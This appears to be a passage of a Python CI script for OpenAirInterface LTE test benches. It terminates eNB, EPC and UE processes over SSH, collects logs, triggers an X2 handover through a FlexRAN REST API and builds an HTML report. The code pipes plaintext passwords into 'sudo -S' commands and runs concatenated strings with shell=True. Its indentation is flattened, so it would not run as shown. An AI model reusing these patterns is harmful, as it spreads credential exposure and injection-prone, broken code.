self.command('echo ' + lPassWord + ' | sudo -S killall --signal SIGINT lte-softmodem || true', '\$', 5)
time.sleep(5)
self.command('stdbuf -o0 ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-softmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + lPassWord + ' | sudo -S killall --signal SIGKILL lte-softmodem || true', '\$', 5)
time.sleep(2)
self.command('rm -f my-lte-softmodem-run' + str(self.eNB_instance) + '.sh', '\$', 5)
self.close()
		# If the tracer option is on, stop tshark on the EPC side
result = re.search('T_stdout', str(self.Initialize_eNB_args))
if result is not None:
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
logging.debug('\u001B[1m Stopping tshark \u001B[0m')
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL tshark', '\$', 5)
time.sleep(1)
if self.EPC_PcapFileName != '':
self.command('echo ' + self.EPCPassword + ' | sudo -S chmod 666 /tmp/' + self.EPC_PcapFileName, '\$', 5)
self.copyin(self.EPCIPAddress, self.EPCUserName, self.EPCPassword, '/tmp/' + self.EPC_PcapFileName, '.')
self.copyout(lIpAddr, lUserName, lPassWord, self.EPC_PcapFileName, lSourcePath + '/cmake_targets/.')
self.close()
logging.debug('\u001B[1m Replaying RAW record file\u001B[0m')
self.open(lIpAddr, lUserName, lPassWord)
self.command('cd ' + lSourcePath + '/common/utils/T/tracer/', '\$', 5)
enbLogFile = self.eNBLogFiles[int(self.eNB_instance)]
raw_record_file = enbLogFile.replace('.log', '_record.raw')
replay_log_file = enbLogFile.replace('.log', '_replay.log')
extracted_txt_file = enbLogFile.replace('.log', '_extracted_messages.txt')
extracted_log_file = enbLogFile.replace('.log', '_extracted_messages.log')
self.command('./extract_config -i ' + lSourcePath + '/cmake_targets/' + raw_record_file + ' > ' + lSourcePath + '/cmake_targets/' + extracted_txt_file, '\$', 5)
self.command('echo $USER; nohup ./replay -i ' + lSourcePath + '/cmake_targets/' + raw_record_file + ' > ' + lSourcePath + '/cmake_targets/' + replay_log_file + ' 2>&1 &', lUserName, 5)
self.command('./textlog -d ' + lSourcePath + '/cmake_targets/' + extracted_txt_file + ' -no-gui -ON -full > ' + lSourcePath + '/cmake_targets/' + extracted_log_file, '\$', 5)
self.close()
self.copyin(lIpAddr, lUserName, lPassWord, lSourcePath + '/cmake_targets/' + extracted_log_file, '.')
logging.debug('\u001B[1m Analyzing eNB replay logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_eNB(extracted_log_file)
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.eNBLogFiles[int(self.eNB_instance)] = ''
else:
analyzeFile = False
if self.eNBLogFiles[int(self.eNB_instance)] != '':
analyzeFile = True
fileToAnalyze = self.eNBLogFiles[int(self.eNB_instance)]
self.eNBLogFiles[int(self.eNB_instance)] = ''
if analyzeFile:
copyin_res = self.copyin(lIpAddr, lUserName, lPassWord, lSourcePath + '/cmake_targets/' + fileToAnalyze, '.')
if (copyin_res == -1):
logging.debug('\u001B[1;37;41m Could not copy eNB logfile to analyze it! \u001B[0m')
self.htmleNBFailureMsg = 'Could not copy eNB logfile to analyze it!'
self.CreateHtmlTestRow('N/A', 'KO', ENB_PROCESS_NOLOGFILE_TO_ANALYZE)
return
if self.eNB_serverId != '0':
self.copyout(self.eNBIPAddress, self.eNBUserName, self.eNBPassword, './' + fileToAnalyze, self.eNBSourceCodePath + '/cmake_targets/')
logging.debug('\u001B[1m Analyzing eNB logfile \u001B[0m ' + fileToAnalyze)
logStatus = self.AnalyzeLogFile_eNB(fileToAnalyze)
if (logStatus < 0):
self.CreateHtmlTestRow('N/A', 'KO', logStatus)
					self.prematureExit = True
return
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
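	# The EPC termination helpers below stop the HSS, MME and S/P-GW processes.
	# For an OAI EPC they send SIGINT first and fall back to SIGKILL if the run_*
	# wrapper is still present; for the ltebox EPC they call the vendor stop
	# scripts (or stop the simulated HSS daemon) instead.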
def TerminateHSS(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_hss oai_hss || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep hss | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_hss oai_hss || true', '\$', 5)
else:
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --name=simulated_hss --stop', '\$', 5)
time.sleep(1)
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL hss_sim', '\$', 5)
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateMME(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_mme mme || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep mme | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_mme mme || true', '\$', 5)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./stop_mme', '\$', 5)
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateSPGW(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGINT run_spgw spgw || true', '\$', 5)
time.sleep(2)
self.command('stdbuf -o0 ps -aux | grep spgw | grep -v grep', '\$', 5)
result = re.search('\/bin\/bash .\/run_', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL run_spgw spgw || true', '\$', 5)
else:
self.command('cd /opt/ltebox/tools', '\$', 5)
self.command('echo ' + self.EPCPassword + ' | sudo -S ./stop_xGw', '\$', 5)
self.close()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateFlexranCtrl(self):
		if not self.flexranCtrlInstalled or not self.flexranCtrlStarted:
return
if self.EPCIPAddress == '' or self.EPCUserName == '' or self.EPCPassword == '':
Usage()
sys.exit('Insufficient Parameter')
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('echo ' + self.EPCPassword + ' | sudo -S daemon --name=flexran_rtc_daemon --stop', '\$', 5)
time.sleep(1)
self.command('echo ' + self.EPCPassword + ' | sudo -S killall --signal SIGKILL rt_controller', '\$', 5)
time.sleep(1)
self.close()
self.flexranCtrlStarted = False
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
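	# TerminateUE_common() detaches one ADB-connected UE: it switches the handset
	# back to airplane mode through /data/local/tmp/off and kills any iperf process
	# still running on it. TerminateUE() runs one such job per device in parallel.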
def TerminateUE_common(self, device_id):
try:
self.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
			# switch the device back to airplane mode (i.e. radio off)
self.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell ps | grep --color=never iperf | grep -v grep', '\$', 5)
result = re.search('shell +(?P<pid>\d+)', str(self.ssh.before))
if result is not None:
pid_iperf = result.group('pid')
self.command('stdbuf -o0 adb -s ' + device_id + ' shell kill -KILL ' + pid_iperf, '\$', 5)
self.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def TerminateUE(self):
terminate_ue_flag = True
self.GetAllUEDevices(terminate_ue_flag)
multi_jobs = []
for device_id in self.UEDevices:
p = Process(target= SSH.TerminateUE_common, args = (device_id,))
p.daemon = True
p.start()
multi_jobs.append(p)
for job in multi_jobs:
job.join()
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
def TerminateOAIUE(self):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath + '/cmake_targets', '\$', 5)
self.command('ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S daemon --name=ue' + str(self.UE_instance) + '_daemon --stop', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal SIGINT lte-uesoftmodem || true', '\$', 5)
time.sleep(5)
self.command('ps -aux | grep --color=never softmodem | grep -v grep', '\$', 5)
result = re.search('lte-uesoftmodem', str(self.ssh.before))
if result is not None:
self.command('echo ' + self.UEPassword + ' | sudo -S killall --signal SIGKILL lte-uesoftmodem || true', '\$', 5)
time.sleep(2)
self.command('rm -f my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh', '\$', 5)
self.close()
result = re.search('ue_', str(self.UELogFile))
if result is not None:
copyin_res = self.copyin(self.UEIPAddress, self.UEUserName, self.UEPassword, self.UESourceCodePath + '/cmake_targets/' + self.UELogFile, '.')
if (copyin_res == -1):
logging.debug('\u001B[1;37;41m Could not copy UE logfile to analyze it! \u001B[0m')
self.htmlUEFailureMsg = 'Could not copy UE logfile to analyze it!'
self.CreateHtmlTestRow('N/A', 'KO', OAI_UE_PROCESS_NOLOGFILE_TO_ANALYZE, 'UE')
self.UELogFile = ''
return
logging.debug('\u001B[1m Analyzing UE logfile \u001B[0m')
logStatus = self.AnalyzeLogFile_UE(self.UELogFile)
result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
if result is not None:
ueAction = 'Sniffing'
else:
ueAction = 'Connection'
if (logStatus < 0):
logging.debug('\u001B[1m' + ueAction + ' Failed \u001B[0m')
self.htmlUEFailureMsg = '<b>' + ueAction + ' Failed</b>\n' + self.htmlUEFailureMsg
self.CreateHtmlTestRow('N/A', 'KO', logStatus, 'UE')
				# When sniffing commercial eNBs the results are random,
				# so a sync failure is not treated as an error in that case.
if (logStatus != OAI_UE_PROCESS_COULD_NOT_SYNC) or (ueAction != 'Sniffing'):
self.Initialize_OAI_UE_args = ''
self.AutoTerminateUEandeNB()
else:
logging.debug('\u001B[1m' + ueAction + ' Completed \u001B[0m')
self.htmlUEFailureMsg = '<b>' + ueAction + ' Completed</b>\n' + self.htmlUEFailureMsg
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
self.UELogFile = ''
else:
self.CreateHtmlTestRow('N/A', 'OK', ALL_PROCESSES_OK)
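	# AutoTerminateUEandeNB() is the clean-up path used when a test step fails:
	# it terminates the ADB UEs and/or the OAI UE if they were initialized, then
	# the eNB, and flags the run as a premature exit.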
def AutoTerminateUEandeNB(self):
if (self.ADBIPAddress != 'none'):
self.testCase_id = 'AUTO-KILL-UE'
self.desc = 'Automatic Termination of UE'
self.ShowTestID()
self.TerminateUE()
if (self.Initialize_OAI_UE_args != ''):
self.testCase_id = 'AUTO-KILL-UE'
self.desc = 'Automatic Termination of UE'
self.ShowTestID()
self.TerminateOAIUE()
if (self.Initialize_eNB_args != ''):
self.testCase_id = 'AUTO-KILL-eNB'
self.desc = 'Automatic Termination of eNB'
self.ShowTestID()
self.eNB_instance = '0'
self.TerminateeNB()
self.prematureExit = True
def IdleSleep(self):
time.sleep(self.idle_sleep_time)
self.CreateHtmlTestRow(str(self.idle_sleep_time) + ' sec', 'OK', ALL_PROCESSES_OK)
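	# X2_Status() polls the FlexRAN controller statistics REST endpoint and stores,
	# per snapshot index (0 = before handover, 1 = after), the connected eNB bs_id
	# values and the RNTIs of the UEs attached to each eNB. The jq queries assume a
	# payload shaped roughly like the following (illustrative sketch only, the field
	# values are made up):
	#   { "mac_stats": [ { "bs_id": 12345,
	#                      "ue_mac_stats": [ { "rnti": 21863 } ] } ] }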
def X2_Status(self, idx, fileName):
cmd = "curl --silent http://" + self.EPCIPAddress + ":9999/stats | jq '.' > " + fileName
message = cmd + '\n'
logging.debug(cmd)
subprocess.run(cmd, shell=True)
if idx == 0:
cmd = "jq '.mac_stats | length' " + fileName
strNbEnbs = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2NbENBs = int(strNbEnbs.strip())
cnt = 0
while cnt < self.x2NbENBs:
cmd = "jq '.mac_stats[" + str(cnt) + "].bs_id' " + fileName
bs_id = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2ENBBsIds[idx].append(bs_id.strip())
cmd = "jq '.mac_stats[" + str(cnt) + "].ue_mac_stats | length' " + fileName
stNbUEs = subprocess.check_output(cmd, shell=True, universal_newlines=True)
nbUEs = int(stNbUEs.strip())
ueIdx = 0
self.x2ENBConnectedUEs[idx].append([])
while ueIdx < nbUEs:
cmd = "jq '.mac_stats[" + str(cnt) + "].ue_mac_stats[" + str(ueIdx) + "].rnti' " + fileName
rnti = subprocess.check_output(cmd, shell=True, universal_newlines=True)
self.x2ENBConnectedUEs[idx][cnt].append(rnti.strip())
ueIdx += 1
cnt += 1
msg = "FlexRan Controller is connected to " + str(self.x2NbENBs) + " eNB(s)"
logging.debug(msg)
message += msg + '\n'
cnt = 0
while cnt < self.x2NbENBs:
msg = " -- eNB: " + str(self.x2ENBBsIds[idx][cnt]) + " is connected to " + str(len(self.x2ENBConnectedUEs[idx][cnt])) + " UE(s)"
logging.debug(msg)
message += msg + '\n'
ueIdx = 0
while ueIdx < len(self.x2ENBConnectedUEs[idx][cnt]):
msg = " -- UE rnti: " + str(self.x2ENBConnectedUEs[idx][cnt][ueIdx])
logging.debug(msg)
message += msg + '\n'
ueIdx += 1
cnt += 1
return message
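	# Perform_X2_Handover() currently supports the 'network' option only: it
	# snapshots the controller state, enables X2 network control on every connected
	# eNB, asks the controller to move each UE to the other eNB, waits, then takes a
	# second snapshot and declares success if the number of UEs per eNB has changed.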
def Perform_X2_Handover(self):
html_queue = SimpleQueue()
fullMessage = '<pre style="background-color:white">'
msg = 'Doing X2 Handover w/ option ' + self.x2_ho_options
logging.debug(msg)
fullMessage += msg + '\n'
if self.x2_ho_options == 'network':
if self.flexranCtrlInstalled and self.flexranCtrlStarted:
self.x2ENBBsIds = []
self.x2ENBConnectedUEs = []
self.x2ENBBsIds.append([])
self.x2ENBBsIds.append([])
self.x2ENBConnectedUEs.append([])
self.x2ENBConnectedUEs.append([])
fullMessage += self.X2_Status(0, self.testCase_id + '_pre_ho.json')
msg = "Activating the X2 Net control on each eNB"
logging.debug(msg)
fullMessage += msg + '\n'
eNB_cnt = self.x2NbENBs
cnt = 0
while cnt < eNB_cnt:
cmd = "curl --silent -XPOST http://" + self.EPCIPAddress + ":9999/rrc/x2_ho_net_control/enb/" + str(self.x2ENBBsIds[0][cnt]) + "/1"
logging.debug(cmd)
fullMessage += cmd + '\n'
subprocess.run(cmd, shell=True)
cnt += 1
# Waiting for the activation to be active
time.sleep(20)
msg = "Switching UE(s) from eNB to eNB"
logging.debug(msg)
fullMessage += msg + '\n'
cnt = 0
while cnt < eNB_cnt:
ueIdx = 0
while ueIdx < len(self.x2ENBConnectedUEs[0][cnt]):
cmd = "curl --silent -XPOST http://" + self.EPCIPAddress + ":9999/rrc/ho/senb/" + str(self.x2ENBBsIds[0][cnt]) + "/ue/" + str(self.x2ENBConnectedUEs[0][cnt][ueIdx]) + "/tenb/" + str(self.x2ENBBsIds[0][eNB_cnt - cnt - 1])
logging.debug(cmd)
fullMessage += cmd + '\n'
subprocess.run(cmd, shell=True)
ueIdx += 1
cnt += 1
time.sleep(20)
# check
logging.debug("Checking the Status after X2 Handover")
fullMessage += self.X2_Status(1, self.testCase_id + '_post_ho.json')
cnt = 0
x2Status = True
while cnt < eNB_cnt:
if len(self.x2ENBConnectedUEs[0][cnt]) == len(self.x2ENBConnectedUEs[1][cnt]):
x2Status = False
cnt += 1
if x2Status:
msg = "X2 Handover was successful"
logging.debug(msg)
fullMessage += msg + '</pre>'
html_queue.put(fullMessage)
self.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
else:
msg = "X2 Handover FAILED"
logging.error(msg)
fullMessage += msg + '</pre>'
html_queue.put(fullMessage)
					self.CreateHtmlTestRowQueue('N/A', 'KO', len(self.UEDevices), html_queue)
else:
self.CreateHtmlTestRow('Cannot perform requested X2 Handover', 'KO', ALL_PROCESSES_OK)
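	#-----------------------------------------------------------
	# Log collection helpers
	#-----------------------------------------------------------
	# Each LogCollect*() method connects to the relevant server, zips the matching
	# log files (build, eNB, EPC components, ping/iperf results or OAI UE logs) and
	# removes the originals so the archive can be retrieved by the CI job afterwards.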
def LogCollectBuild(self):
if (self.eNBIPAddress != '' and self.eNBUserName != '' and self.eNBPassword != ''):
IPAddress = self.eNBIPAddress
UserName = self.eNBUserName
Password = self.eNBPassword
SourceCodePath = self.eNBSourceCodePath
elif (self.UEIPAddress != '' and self.UEUserName != '' and self.UEPassword != ''):
IPAddress = self.UEIPAddress
UserName = self.UEUserName
Password = self.UEPassword
SourceCodePath = self.UESourceCodePath
else:
sys.exit('Insufficient Parameter')
self.open(IPAddress, UserName, Password)
self.command('cd ' + SourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('rm -f build.log.zip', '\$', 5)
self.command('zip build.log.zip build_log_*/*', '\$', 60)
self.close()
def LogCollecteNB(self):
self.open(self.eNBIPAddress, self.eNBUserName, self.eNBPassword)
self.command('cd ' + self.eNBSourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm -f enb.log.zip', '\$', 5)
self.command('echo ' + self.eNBPassword + ' | sudo -S zip enb.log.zip enb*.log core* enb_*record.raw enb_*.pcap enb_*txt', '\$', 60)
self.command('echo ' + self.eNBPassword + ' | sudo -S rm enb*.log core* enb_*record.raw enb_*.pcap enb_*txt', '\$', 5)
self.close()
def LogCollectPing(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f ping.log.zip', '\$', 5)
self.command('zip ping.log.zip ping*.log', '\$', 60)
self.command('rm ping*.log', '\$', 5)
self.close()
def LogCollectIperf(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f iperf.log.zip', '\$', 5)
self.command('zip iperf.log.zip iperf*.log', '\$', 60)
self.command('rm iperf*.log', '\$', 5)
self.close()
def LogCollectHSS(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f hss.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('zip hss.log.zip hss*.log', '\$', 60)
self.command('rm hss*.log', '\$', 5)
else:
self.command('cp /opt/hss_sim0609/hss.log .', '\$', 60)
self.command('zip hss.log.zip hss.log', '\$', 60)
self.close()
def LogCollectMME(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f mme.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('zip mme.log.zip mme*.log', '\$', 60)
self.command('rm mme*.log', '\$', 5)
else:
self.command('cp /opt/ltebox/var/log/*Log.0 .', '\$', 5)
self.command('zip mme.log.zip mmeLog.0 s1apcLog.0 s1apsLog.0 s11cLog.0 libLog.0 s1apCodecLog.0', '\$', 60)
self.close()
def LogCollectSPGW(self):
self.open(self.EPCIPAddress, self.EPCUserName, self.EPCPassword)
self.command('cd ' + self.EPCSourceCodePath, '\$', 5)
self.command('cd scripts', '\$', 5)
self.command('rm -f spgw.log.zip', '\$', 5)
if re.match('OAI', self.EPCType, re.IGNORECASE):
self.command('zip spgw.log.zip spgw*.log', '\$', 60)
self.command('rm spgw*.log', '\$', 5)
else:
self.command('cp /opt/ltebox/var/log/xGwLog.0 .', '\$', 5)
self.command('zip spgw.log.zip xGwLog.0', '\$', 60)
self.close()
def LogCollectOAIUE(self):
self.open(self.UEIPAddress, self.UEUserName, self.UEPassword)
self.command('cd ' + self.UESourceCodePath, '\$', 5)
self.command('cd cmake_targets', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S rm -f ue.log.zip', '\$', 5)
self.command('echo ' + self.UEPassword + ' | sudo -S zip ue.log.zip ue*.log core* ue_*record.raw ue_*.pcap ue_*txt', '\$', 60)
self.command('echo ' + self.UEPassword + ' | sudo -S rm ue*.log core* ue_*record.raw ue_*.pcap ue_*txt', '\$', 5)
self.close()
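	# RetrieveSystemVersion() gathers OS, kernel, UHD, USRP and CPU details from the
	# eNB or UE server for the HTML report footer. When no remote machine is
	# configured (IP address set to 'none') it falls back to the hard-coded bench
	# description below.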
def RetrieveSystemVersion(self, machine):
if self.eNBIPAddress == 'none' or self.UEIPAddress == 'none':
self.OsVersion = 'Ubuntu 16.04.5 LTS'
self.KernelVersion = '4.15.0-45-generic'
self.UhdVersion = '3.13.0.1-0'
self.UsrpBoard = 'B210'
self.CpuNb = '4'
self.CpuModel = 'Intel(R) Core(TM) i5-6200U'
self.CpuMHz = '2399.996 MHz'
return 0
if machine == 'eNB':
if self.eNBIPAddress != '' and self.eNBUserName != '' and self.eNBPassword != '':
IPAddress = self.eNBIPAddress
UserName = self.eNBUserName
Password = self.eNBPassword
else:
return -1
if machine == 'UE':
if self.UEIPAddress != '' and self.UEUserName != '' and self.UEPassword != '':
IPAddress = self.UEIPAddress
UserName = self.UEUserName
Password = self.UEPassword
else:
return -1
self.open(IPAddress, UserName, Password)
self.command('lsb_release -a', '\$', 5)
result = re.search('Description:\\\\t(?P<os_type>[a-zA-Z0-9\-\_\.\ ]+)', str(self.ssh.before))
if result is not None:
self.OsVersion = result.group('os_type')
logging.debug('OS is: ' + self.OsVersion)
self.command('uname -r', '\$', 5)
result = re.search('uname -r\\\\r\\\\n(?P<kernel_version>[a-zA-Z0-9\-\_\.]+)', str(self.ssh.before))
if result is not None:
self.KernelVersion = result.group('kernel_version')
logging.debug('Kernel Version is: ' + self.KernelVersion)
self.command('dpkg --list | egrep --color=never libuhd003', '\$', 5)
result = re.search('libuhd003:amd64 *(?P<uhd_version>[0-9\.]+)', str(self.ssh.before))
if result is not None:
self.UhdVersion = result.group('uhd_version')
logging.debug('UHD Version is: ' + self.UhdVersion)
self.command('echo ' + Password + ' | sudo -S uhd_find_devices', '\$', 15)
result = re.search('product: (?P<usrp_board>[0-9A-Za-z]+)\\\\r\\\\n', str(self.ssh.before))
if result is not None:
self.UsrpBoard = result.group('usrp_board')
logging.debug('USRP Board is: ' + self.UsrpBoard)
self.command('lscpu', '\$', 5)
result = re.search('CPU\(s\): *(?P<nb_cpus>[0-9]+).*Model name: *(?P<model>[a-zA-Z0-9\-\_\.\ \(\)]+).*CPU MHz: *(?P<cpu_mhz>[0-9\.]+)', str(self.ssh.before))
if result is not None:
self.CpuNb = result.group('nb_cpus')
logging.debug('nb_cpus: ' + self.CpuNb)
self.CpuModel = result.group('model')
logging.debug('model: ' + self.CpuModel)
self.CpuMHz = result.group('cpu_mhz') + ' MHz'
logging.debug('cpu_mhz: ' + self.CpuMHz)
self.close()
#-----------------------------------------------------------
# HTML Reporting....
#-----------------------------------------------------------
def CreateHtmlHeader(self):
if (not self.htmlHeaderCreated):
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
logging.debug('\u001B[1m Creating HTML header \u001B[0m')
logging.debug('\u001B[1m----------------------------------------\u001B[0m')
self.htmlFile = open('test_results.html', 'w')
self.htmlFile.write('<!DOCTYPE html>\n')
self.htmlFile.write('<html class="no-js" lang="en-US">\n')
self.htmlFile.write('<head>\n')
self.htmlFile.write(' <meta name="viewport" content="width=device-width, initial-scale=1">\n')
self.htmlFile.write(' <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">\n')
self.htmlFile.write(' <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>\n')
self.htmlFile.write(' <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>\n')
self.htmlFile.write(' <title>Test Results for TEMPLATE_JOB_NAME job build #TEMPLATE_BUILD_ID</title>\n')
self.htmlFile.write('</head>\n')
self.htmlFile.write('<body><div class="container">\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <table style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <tr style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <td style="border-collapse: collapse; border: none;">\n')
self.htmlFile.write(' <a href="http://www.openairinterface.org/">\n')
self.htmlFile.write(' <img src="http://www.openairinterface.org/wp-content/uploads/2016/03/cropped-oai_final_logo2.png" alt="" border="none" height=50 width=150>\n')
self.htmlFile.write(' </img>\n')
self.htmlFile.write(' </a>\n')
self.htmlFile.write(' </td>\n')
self.htmlFile.write(' <td style="border-collapse: collapse; border: none; vertical-align: center;">\n')
self.htmlFile.write(' <b><font size = "6">Job Summary -- Job: TEMPLATE_JOB_NAME -- Build-ID: TEMPLATE_BUILD_ID</font></b>\n')
self.htmlFile.write(' </td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
self.htmlFile.write(' <br>\n')
self.htmlFile.write(' <div class="alert alert-info"><strong> <span class="glyphicon glyphicon-dashboard"></span> TEMPLATE_STAGE_NAME</strong></div>\n')
self.htmlFile.write(' <table border = "1">\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-time"></span> Build Start Time (UTC) </td>\n')
self.htmlFile.write(' <td>TEMPLATE_BUILD_TIME</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-cloud-upload"></span> GIT Repository </td>\n')
self.htmlFile.write(' <td><a href="' + self.ranRepository + '">' + self.ranRepository + '</a></td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-wrench"></span> Job Trigger </td>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td>Merge-Request</td>\n')
else:
self.htmlFile.write(' <td>Push to Branch</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-log-out"></span> Source Branch </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tree-deciduous"></span> Branch</td>\n')
self.htmlFile.write(' <td>' + self.ranBranch + '</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' <tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tag"></span> Source Commit ID </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-tag"></span> Commit ID </td>\n')
self.htmlFile.write(' <td>' + self.ranCommitID + '</td>\n')
self.htmlFile.write(' </tr>\n')
			if self.ranCommitID != '':
commit_message = subprocess.check_output("git log -n1 --pretty=format:\"%s\" " + self.ranCommitID, shell=True, universal_newlines=True)
commit_message = commit_message.strip()
self.htmlFile.write(' <tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-comment"></span> Source Commit Message </td>\n')
else:
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-comment"></span> Commit Message </td>\n')
self.htmlFile.write(' <td>' + commit_message + '</td>\n')
self.htmlFile.write(' </tr>\n')
if (self.ranAllowMerge):
self.htmlFile.write(' <tr>\n')
self.htmlFile.write(' <td bgcolor = "lightcyan" > <span class="glyphicon glyphicon-log-in"></span> Target Branch </td>\n')
if (self.ranTargetBranch == ''):
self.htmlFile.write(' <td>develop</td>\n')
else:
self.htmlFile.write(' <td>' + self.ranTargetBranch + '</td>\n')
self.htmlFile.write(' </tr>\n')
self.htmlFile.write(' </table>\n')
if (self.ADBIPAddress != 'none'):
terminate_ue_flag = True
self.GetAllUEDevices(terminate_ue_flag)
self.GetAllCatMDevices(terminate_ue_flag)
self.htmlUEConnected = len(self.UEDevices)
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.UEDevices)) + ' UE(s) is(are) connected to ADB bench server</h2>\n')
self.htmlFile.write(' <h2><span class="glyphicon glyphicon-phone"></span> <span class="glyphicon glyphicon-menu-right"></span> ' + str(len(self.CatMDevices)) + ' CAT-M UE(s) is(are) connected to bench server</h2>\n')
else:
self.UEDevices.append('OAI-UE')
self.htmlUEConnected = len(self.UEDevices)
